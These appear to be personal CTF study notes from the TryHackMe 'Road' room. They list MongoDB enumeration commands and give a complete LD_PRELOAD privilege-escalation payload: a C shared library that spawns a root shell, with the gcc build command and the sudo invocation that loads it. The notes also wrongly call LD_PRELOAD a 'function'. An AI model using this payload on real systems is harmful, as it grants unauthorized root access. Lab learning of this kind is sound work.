LD_PRELOAD and Mongo Notes

, ,

Before all

I learned these from Road on TryHackMe today

Notes

Mongo DB

It usually runs on port 27017

payloads(?):

Look for working services 

1
ss -tulnp

MongoDB 

1
2
3
4
5
6
7
8
/*show databases*/
show db
/*switch to a database*/
use backup # In case the db name is backup
/*list tables*/
show collections
/*read contents in a table*/
db.user.find() # In case the table name is user

LD_PRELOAD

LD_PRELOAD is a function allows any program to share libraries.

payloads:

shell.c 

1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
 unsetenv("LD_PRELOAD");
 setgid(0);
 setuid(0);
 system("/bin/bash");
}

library compilation
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
add LD_PRELOAD with sudo
sudo LD_PRELOAD=/home/webdeveloper/shell.so sky_backup_utility
In case of sudo result like this:
image

env_keep+=LD_PRELOAD